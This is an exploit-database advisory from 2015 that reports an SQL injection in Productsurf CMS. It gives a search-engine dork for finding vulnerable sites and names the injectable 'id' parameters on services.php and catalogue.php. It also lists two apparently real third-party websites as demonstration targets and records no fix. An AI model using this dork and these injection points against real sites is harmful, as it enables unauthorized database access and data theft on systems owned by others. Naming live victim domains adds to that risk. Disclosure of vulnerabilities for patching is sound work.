Productsurf Cms Sql Injection Vulnerability

2015-06-14 19:01:41
Posted by: irist.ir

#################################

#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#

#####################################

#####################################

# Iranian Exploit DataBase

# Productsurf Cms Sql Injection Vulnerability

# Vendor site : http://www.eproductsurf.com/

# Dork : "Powered by Productsurf"

# Author : IeDb

# Site : Www.IeDb.Ir - Www.IrIsT.Ir

# Vulnerability attack information site : http://vuln.iedb.ir/

# Fb Page : https://www.facebook.com/iedb.ir

#####################################

Bug :

http://www.site.com/services.php?id=[sql]
http://www.site.com/catalogue.php?id=[sql]

Dem0 :

http://www.springsadvt.com/services.php?id='[sql]
http://www.astarantiques.com/catalogue.php?id=125'[sql]

#####################################

# Archive Exploit = http://www.iedb.ir/exploits-3271.html

#####################################

Fixes

No fixes

In order to submit a new fix you need to be registered.